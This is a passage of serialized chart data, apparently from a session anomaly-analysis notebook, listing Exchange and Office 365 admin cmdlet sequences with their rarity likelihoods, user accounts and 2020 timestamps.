NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"TimeGenerated_min\":{\"__ndarray__\":\"AIDbVGggd0IAgL9qcyB3QgCAk//9IndCAIA9+wcjd0IAAILHTiN3QgCAWwpYI3dCAIBegKIjd0IAAM2/qyN3QgCAaPL1IXdCAICHSt0id0IAAAUB8iJ3QgCAF7QGI3dCAIDBbRsjd0IAgIkiMCN3QgCAqt1EI3dCAICci1kjd0IAgHw8biN3QgCAeyd1I3dCAAAp1okjd0IAgGEGlyN3QgAA/berI3dCAIDGi8Ajd0IAAHK90BB3QgAA+zjREHdCAABAbNEQd0IAgMgw0hB3QgCABQbUEHdCAIDi5NYQd0IAgCrT1xB3QgAAzWGAEXdCAADqZYIRd0IAANyRghF3QgCAYRiDEXdCAIBJFoQRd0IAAIN/hBF3QgAAiuaEEXdCAADYVoURd0IAAOPmhRF3QgAAcxCQEXdCAIAvrMYRd0IAAM4TyBF3QgCAaNXIEXdCAIAB+8gRd0IAAAxXyRF3QgCAgEjKEXdCAAA4FMwRd0IAAHsu5hJ3QgCAS/h1E3dCAACt+aETd0IAALE5sxN3QgAAnWazE3dCAAA5n0wUd0IAgFNMwxR3QgAAQ4TpFHdCAICmY+oUd0IAAOKi6hR3QgAAVwIMFXdCAAC34mEVd0IAgNr1aRV3QgAAdweqFXdCAIDBgqoVd0IAAAfqqhV3QgCAyrmrFXdCAID976sVd0IAAMmOrRV3QgAAf8StFXdCAAC/9/0Vd0IAgGs5/hV3QgAABCX/FXdCAIC2Zf8Vd0IAAOyl/xV3QgAAnFkAFndCAACYKgEWd0IAAA8mAhZ3QgCA2UG9F3dCAIBPmccXd0IAABM8Dhh3QgCA34kZGHdCAADzxlIYd0IAACLxYhh3QgCAxFFsGHdCAIBZFp8Yd0IAANb/rhh3QgAA3/q5GHdCAICw0AUZd0IAAFGZWBl3QgCAHAJjGXdCAICF+P0Zd0IAgNddWhp3QgAAPOSPGndCAABuvaIad0IAgOlirBp3QgCAGsX/GndCAACGz0Ubd0IAgNqtURt3QgAA5jiaG3dCAADJcfYbd0IAALxTZxx3QgAAn8qPHHdCAIBo2pocd0IAABY00hx3QgAAZ3zjHHdCAIA8E+0cd0IAAGUE/hx3QgCAAoNSHXdCAAA8NSwed0IAAJXzNx53QgCAy8NbHndCAICiMlwed0IAAOXSXR53QgCA1MN6HndCAABTTn4ed0IAALJXJB93QgCAb3UtH3dCAICo7nUfd0IAAK9DFyB3QgAAPoIhIHdCAAAq/Q4hd0IAgC4eGSF3QgAA+vRkIXdCAADabMEhd0IAAArWwyF3QgCAxovMIXdCAICUP+Ehd0IAgGjy9SF3QgCAA3YJIndCAIBE/Qkid0IAgHVRDCJ3QgAAmgEhIndCAIA7sjUid0IAAE5lSiJ3QgCA0RpfIndCAIAXUHAid0IAgEDJcyJ3QgCAFTh7IndCAIDU8YQid0IAgLPzjyJ3QgCAiDKfIndCAAC7b6oid0IAgG7isyJ3QgCATZ21IndCAADCscUid0IAgK0nxiJ3QgCAm5vIIndCAIBdRsoid0IAgMMF0iJ3QgAAyN/SIndCAACcENMid0IAAHN/0yJ3QgCAUKTTIndCAACTzdMid0IAAMsX1CJ3QgAAXU3VIndCAIB1fdUid0I=\",\"dtype\":\"float64\",\"shape\":[154]},\"UserId\":[\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"color\":[\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"],\"index\":[0,1,2,3,4,5,6,7,8,11,15,19,23,27,31,35,39,42,45,46,49,54,128,130,131,132,134,138,139,142,147,148,149,150,151,152,153,154,157,158,160,161,162,163,165,166,167,169,170,172,173,174,175,177,178,179,180,181,183,184,186,188,189,190,191,192,193,194,196,197,198,199,201,203,205,206,208,210,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,229,230,231,232,235,238,240,241,242,243,244,247,254,255,257,258,259,261,263,267,268,272,275,277,291,293,299,307,308,309,313,320,322,323,326,329,335,339,344,349,350,352,354,357,360,362,366,367,374,375,378,383,387,388,389,391,392,393,394,396,397],\"rarest_window3\":[[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-Mailbox\",\"Set-Mailbox\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Remove-MailboxLocation\",\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-App\",\"New-App\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-OwaMailboxPolicy\",\"Set-Mailbox\",\"Add-MailboxPermission\"],[\"Set-OwaMailboxPolicy\",\"Set-Mailbox\",\"Add-MailboxPermission\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ExchangeAssistanceConfig\",\"Set-AdminAuditLogConfig\",\"Set-TenantObjectVersion\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-UnifiedGroup\",\"Remove-UnifiedGroup\"],[\"Remove-UnifiedGroup\",\"Remove-UnifiedGroup\"],[\"Remove-UnifiedGroup\",\"Remove-UnifiedGroup\"],[\"Set-ExchangeAssistanceConfig\",\"Set-TransportConfig\",\"Set-RecipientEnforcementProvisioningPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"]],\"rarest_window3_likelihood\":{\"__ndarray__\":\"Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj/mk1whRthQP8emX9S7ybM/x6Zf1LvJsz/Hpl/Uu8mzP8emX9S7ybM/x6Zf1LvJsz/Hpl/Uu8mzP5NgdAvEKk0/k2B0C8QqTT9nym6baQuoP8emX9S7ybM/x6Zf1LvJsz9nym6baQuoP2fKbptpC6g/x6Zf1LvJsz/Hpl/Uu8mzP4ATX5xAOPY+x6Zf1LvJsz/Hpl/Uu8mzP5NgdAvEKk0/x6Zf1LvJsz/Hpl/Uu8mzP2fKbptpC6g/x6Zf1LvJsz8HG9tEBpltPwcb20QGmW0/wXgr+xxSMz/hF2+OujY0P8emX9S7ybM/Z8pum2kLqD/Hpl/Uu8mzP5NgdAvEKk0/x6Zf1LvJsz9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP+aTXCFG2FA/x6Zf1LvJsz9nym6baQuoP8emX9S7ybM/Z8pum2kLqD/Hpl/Uu8mzP2fKbptpC6g/5pNcIUbYUD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP8emX9S7ybM/x6Zf1LvJsz/Hpl/Uu8mzP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/BxvbRAaZbT9nym6baQuoP2fKbptpC6g/iY+KUFZE/T5nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD/+10yLIUEWP/7XTIshQRY/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD8HG9tEBpltP2fKbptpC6g/Z8pum2kLqD8HG9tEBpltP2fKbptpC6g/Z8pum2kLqD8HG9tEBpltP7kzgspBKhU/Z8pum2kLqD9nym6baQuoPzPMHyOt0Ts/M8wfI63ROz8zzB8jrdE7PwKauiszdhA/BlI6ubqfPj9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP2fKbptpC6g/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/Z8pum2kLqD+5U0mWClemP2fKbptpC6g/5pNcIUbYUD9nym6baQuoP7lTSZYKV6Y/x6Zf1LvJsz/nmqaw4HdEP8emX9S7ybM/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/x6Zf1LvJsz/Hpl/Uu8mzP2fKbptpC6g/Z8pum2kLqD8=\",\"dtype\":\"float64\",\"shape\":[154]},\"time_col\":[\"2020-05-12 01:34:59+00:00\",\"2020-05-12 04:48:43+00:00\",\"2020-05-20 02:18:27+00:00\",\"2020-05-20 05:12:55+00:00\",\"2020-05-21 01:50:12+00:00\",\"2020-05-21 04:32:03+00:00\",\"2020-05-22 02:13:21+00:00\",\"2020-05-22 04:54:58+00:00\",\"2020-05-16 21:23:49+00:00\",\"2020-05-19 16:46:51+00:00\",\"2020-05-19 22:48:50+00:00\",\"2020-05-20 04:50:35+00:00\",\"2020-05-20 10:52:47+00:00\",\"2020-05-20 16:54:39+00:00\",\"2020-05-20 22:56:57+00:00\",\"2020-05-21 04:58:21+00:00\",\"2020-05-21 10:59:57+00:00\",\"2020-05-21 13:00:51+00:00\",\"2020-05-21 19:02:18+00:00\",\"2020-05-21 22:52:47+00:00\",\"2020-05-22 04:54:26+00:00\",\"2020-05-22 10:58:25+00:00\",\"2020-03-24 14:56:52+00:00\",\"2020-03-24 15:05:18+00:00\",\"2020-03-24 15:08:48+00:00\",\"2020-03-24 15:22:13+00:00\",\"2020-03-24 15:54:15+00:00\",\"2020-03-24 16:44:25+00:00\",\"2020-03-24 17:00:41+00:00\",\"2020-03-26 18:06:26+00:00\",\"2020-03-26 18:41:40+00:00\",\"2020-03-26 18:44:40+00:00\",\"2020-03-26 18:53:51+00:00\",\"2020-03-26 19:11:11+00:00\",\"2020-03-26 19:18:22+00:00\",\"2020-03-26 19:25:24+00:00\",\"2020-03-26 19:33:04+00:00\",\"2020-03-26 19:42:54+00:00\",\"2020-03-26 22:40:30+00:00\",\"2020-03-27 14:34:51+00:00\",\"2020-03-27 14:59:24+00:00\",\"2020-03-27 15:12:37+00:00\",\"2020-03-27 15:15:11+00:00\",\"2020-03-27 15:21:28+00:00\",\"2020-03-27 15:37:57+00:00\",\"2020-03-27 16:09:20+00:00\",\"2020-03-31 02:19:26+00:00\",\"2020-04-01 20:12:19+00:00\",\"2020-04-02 09:01:22+00:00\",\"2020-04-02 14:02:50+00:00\",\"2020-04-02 14:05:54+00:00\",\"2020-04-04 10:43:38+00:00\",\"2020-04-05 21:17:39+00:00\",\"2020-04-06 08:25:34+00:00\",\"2020-04-06 08:40:49+00:00\",\"2020-04-06 08:45:08+00:00\",\"2020-04-06 18:28:22+00:00\",\"2020-04-07 19:29:10+00:00\",\"2020-04-07 21:50:17+00:00\",\"2020-04-08 16:29:58+00:00\",\"2020-04-08 16:38:23+00:00\",\"2020-04-08 16:45:26+00:00\",\"2020-04-08 16:59:37+00:00\",\"2020-04-08 17:03:19+00:00\",\"2020-04-08 17:31:38+00:00\",\"2020-04-08 17:35:18+00:00\",\"2020-04-09 16:56:54+00:00\",\"2020-04-09 17:01:23+00:00\",\"2020-04-09 17:17:28+00:00\",\"2020-04-09 17:21:53+00:00\",\"2020-04-09 17:26:16+00:00\",\"2020-04-09 17:38:32+00:00\",\"2020-04-09 17:52:48+00:00\",\"2020-04-09 18:09:58+00:00\",\"2020-04-15 03:13:51+00:00\",\"2020-04-15 06:14:35+00:00\",\"2020-04-16 02:49:02+00:00\",\"2020-04-16 06:06:35+00:00\",\"2020-04-16 22:46:54+00:00\",\"2020-04-17 03:29:24+00:00\",\"2020-04-17 06:13:17+00:00\",\"2020-04-17 21:00:31+00:00\",\"2020-04-18 01:38:36+00:00\",\"2020-04-18 04:50:30+00:00\",\"2020-04-19 02:55:49+00:00\",\"2020-04-20 03:02:34+00:00\",\"2020-04-20 06:04:29+00:00\",\"2020-04-22 03:12:39+00:00\",\"2020-04-23 06:07:23+00:00\",\"2020-04-23 21:42:48+00:00\",\"2020-04-24 03:12:12+00:00\",\"2020-04-24 06:00:47+00:00\",\"2020-04-25 06:18:01+00:00\",\"2020-04-26 02:42:04+00:00\",\"2020-04-26 06:09:29+00:00\",\"2020-04-27 03:17:16+00:00\",\"2020-04-28 06:08:58+00:00\",\"2020-04-29 15:01:44+00:00\",\"2020-04-30 02:48:54+00:00\",\"2020-04-30 06:02:13+00:00\",\"2020-04-30 22:09:32+00:00\",\"2020-05-01 03:11:34+00:00\",\"2020-05-01 05:59:09+00:00\",\"2020-05-01 10:55:14+00:00\",\"2020-05-02 11:31:53+00:00\",\"2020-05-05 02:56:24+00:00\",\"2020-05-05 06:21:38+00:00\",\"2020-05-05 16:47:31+00:00\",\"2020-05-05 16:55:05+00:00\",\"2020-05-05 17:23:30+00:00\",\"2020-05-06 01:49:17+00:00\",\"2020-05-06 02:51:10+00:00\",\"2020-05-08 03:12:52+00:00\",\"2020-05-08 05:52:11+00:00\",\"2020-05-09 02:58:45+00:00\",\"2020-05-11 01:58:14+00:00\",\"2020-05-11 04:57:16+00:00\",\"2020-05-14 02:07:32+00:00\",\"2020-05-14 05:04:33+00:00\",\"2020-05-15 03:09:56+00:00\",\"2020-05-16 06:05:56+00:00\",\"2020-05-16 06:48:04+00:00\",\"2020-05-16 09:20:17+00:00\",\"2020-05-16 15:22:05+00:00\",\"2020-05-16 21:23:49+00:00\",\"2020-05-17 03:04:51+00:00\",\"2020-05-17 03:14:05+00:00\",\"2020-05-17 03:54:47+00:00\",\"2020-05-17 09:56:20+00:00\",\"2020-05-17 15:57:55+00:00\",\"2020-05-17 21:59:40+00:00\",\"2020-05-18 04:01:35+00:00\",\"2020-05-18 09:02:19+00:00\",\"2020-05-18 10:03:01+00:00\",\"2020-05-18 12:12:55+00:00\",\"2020-05-18 15:02:53+00:00\",\"2020-05-18 18:15:15+00:00\",\"2020-05-18 22:41:41+00:00\",\"2020-05-19 01:58:06+00:00\",\"2020-05-19 04:43:13+00:00\",\"2020-05-19 05:13:27+00:00\",\"2020-05-19 09:54:28+00:00\",\"2020-05-19 10:02:31+00:00\",\"2020-05-19 10:45:23+00:00\",\"2020-05-19 11:14:31+00:00\",\"2020-05-19 13:29:55+00:00\",\"2020-05-19 13:44:48+00:00\",\"2020-05-19 13:48:08+00:00\",\"2020-05-19 13:55:42+00:00\",\"2020-05-19 